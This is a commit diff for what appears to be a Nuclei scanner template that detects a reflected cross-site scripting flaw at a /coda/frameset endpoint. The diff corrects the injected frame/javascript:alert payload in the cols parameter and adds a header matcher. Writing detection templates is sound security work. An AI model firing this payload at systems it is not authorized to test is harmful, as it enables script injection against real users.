update payload & matchers
parent
bedef14224
commit
5b6568519d
|
@ -21,7 +21,7 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /coda/frameset?cols="><frame+src="javascript:alert('document.domain')"> HTTP/1.1
|
||||
GET /coda/frameset?cols="><frame%20src="javascript:alert(document.domain)"> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
|
@ -31,6 +31,11 @@ http:
|
|||
words:
|
||||
- '<frameset cols=""><frame src="javascript:alert(document.domain)">'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue